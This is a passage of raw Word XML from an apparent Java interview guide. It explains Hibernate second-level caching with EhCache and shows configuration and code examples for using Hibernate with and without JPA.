          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity is never updated, and the cache is used only for reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC467BA" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2012"/>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READ_WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity can be updated, and the cache is used for both reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC21B7" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2012"/>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NONSTRICT_READ_WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity is read from the cache, but concurrent writes might not always be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336267A" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2012"/>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ache Eviction Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate provides eviction strategies that determine when to evict cached data. You can manually control cache eviction or configure automatic eviction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EC440" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Example with EhCache as Cache Provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BB25A" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2013"/>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EhCache Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ehcache.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A61524"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t;ehcache&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385D5E0"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cache name="com.example.Product"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206ADD60"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maxEntriesLocalHeap="1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB6E09"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timeToLiveSeconds="3600" /&gt; &lt;!-- Time-to-live for cache entries --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37793805"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t;/ehcache&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066EF1C" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2014"/>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Hibernate Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EFD01A"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hibernate.cache.use_second_level_cache=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F417F"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hibernate.cache.region.factory_class=org.hibernate.cache.ehcache.EhCacheRegionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22508CFD"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hibernate.cache.use_query_cache=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D9650"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hibernate.cache.provider_class=org.hibernate.cache.ehcache.EhCacheProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC2AB7" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Benefits of Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF9C67" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces database access by caching frequently used data, leading to faster application response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADFE0CE" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps in scaling applications by reducing the load on the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFF9F4" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4EB8C" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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he second-level cache in Hibernate provides a mechanism to store frequently used entities and collections outside of the current session, which can improve performance and reduce database access. It is configurable and can be used with different cache providers like Ehcache, Infinispan, etc. Proper configuration of the second-level cache can significantly improve the performance of your Hibernate-based applications, especially for read-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0E746" w14:textId="2E904E06" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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450105C">
          <v:rect id="_x0000_i2464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46620EBB" w14:textId="05341CC4" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="0068088E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="_Toc196308039"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we use Hibernate without JPA</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:p w14:paraId="46416E85" w14:textId="3812D766" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used without </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Hibernate is a powerful and flexible ORM (Object-Relational Mapping) framework that can work independently without requiring JPA, although JPA is often used as a standard API for ORM in Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739CB44"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Here’s the breakdown of how Hibernate works with and without JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37DF92" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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1. Hibernate Without JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88C525"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n this case, Hibernate works as a standalone ORM framework, and you use its native API to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030005DF" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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onfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate can be configured using hibernate.cfg.xml or programmatically using the Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EDDF01" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You create a SessionFactory from the Hibernate Configuration object, which manages the sessions and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90FC89" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You directly interact with the database through the Hibernate Session object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734F613" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Annotations and XML Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate supports annotations for entity mappings (@Entity, @Table, etc.) as well as XML-based mapping files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D11CBB" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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Example of Hibernate without JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62480600" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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lastRenderedPageBreak/>
        <w:t>Hibernate Configuration (hibernate.cfg.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B2690"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t;hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA31FC1"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session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090606DC"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property name="hibernate.dialect"&gt;org.hibernate.dialect.H2Dialect&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741DC52"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property name="hibernate.hbm2ddl.auto"&gt;update&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE0AAF"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property name="hibernate.show_sql"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCADB2"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property name="hibernate.format_sql"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24006281"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property name="hibernate.cache.use_second_level_cache"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCFA45D"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property name="hibernate.cache.region.factory_class"&gt;org.hibernate.cache.ehcache.EhCacheRegionFactory&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E151C9"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session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B693C"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t;/hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0D4C5" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Entity Class (Product.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F8FAF"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8322C"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able(name = "product")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6996BB"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ublic class Product {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C8481E"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E838BF9"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DD0F0"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6535DF"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D065B4"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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DAA559" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79062404"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0A1BD"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69CC44" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2019"/>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Session Management in Code</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE293D"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ublic class HibernateExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D10EF83"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC15313"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Create session factory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CDB9E"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SessionFactory factory = new Configuration().configure("hibernate.cfg.xml").addAnnotatedClass(Product.class).buildSessionFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1FC76"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795F2051"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Open session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167C188"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Session session = factory.getCurrentSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14784CDC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66294E37"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA79F5"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Create new product object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C158E02"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oduct tempProduct = new Product("Laptop", 1000.00);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5D30B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE31A0"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Start transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB29ECA"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session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E829927"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A4B0E"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Save the product object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E226A"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session.save(tempProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B1D8A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E891997"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Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA78341"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session.getTransaction().commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216346CE"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A01FC7"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factory.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F0186B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E595EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB51212"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982EAC5"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In this case, Hibernate directly manages the Session and interacts with the database without using any JPA-specific annotations or classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75642D" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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2. Hibernate With JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890FFAB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">When you use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Hibernate acts as the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA provider</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The JPA standard provides an abstraction over the actual ORM framework (like Hibernate). This means you can switch between different JPA providers (Hibernate, EclipseLink, OpenJPA, etc.) without changing much of your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD1D7C" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2020"/>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EntityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With JPA, you interact with the EntityManager instead of Hibernate’s Session object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550FA23" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2020"/>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JPA Annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use JPA annotations such as @Entity, @Table, @Id, @GeneratedValue, etc. These are part of the JPA specification, but Hibernate supports them as a JPA provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98CD43" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2020"/>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JPA Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA provides a more standardized way of configuring the persistence context, typically through persistence.xml or Spring’s application properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17072DD4" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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Example of Hibernate With JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975D11F" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2021"/>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JPA Configuration (persistence.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E44118"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t;persistence xmlns="http://java.sun.com/xml/ns/persistence"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1FD59"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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381320D"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xsi:schemaLocation="http://java.sun.com/xml/ns/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69D3B8"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http://java.sun.com/xml/ns/persistence/persistence_2_0.xsd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC2020"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version="2.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29991CC8"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persistence-unit name="myJpaUnit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F1DE20"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provider&gt;org.hibernate.jpa.HibernatePersistenceProvider&lt;/provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E357AD"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class&gt;com.example.Product&lt;/class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA770F9"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properties&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5D43A"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property name="hibernate.dialect" value="org.hibernate.dialect.H2Dialect"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB91C2"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property name="hibernate.hbm2ddl.auto" value="update"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A38D67"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property name="hibernate.show_sql" value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31747EA9"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properties&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2BF5DB"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lt;/persistence-unit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83B1F0"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t;/persistence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E4D28" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2022"/>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Entity Class (Product.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2D2DF"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Entity</w:t>
      </w:r>
    </w:p>
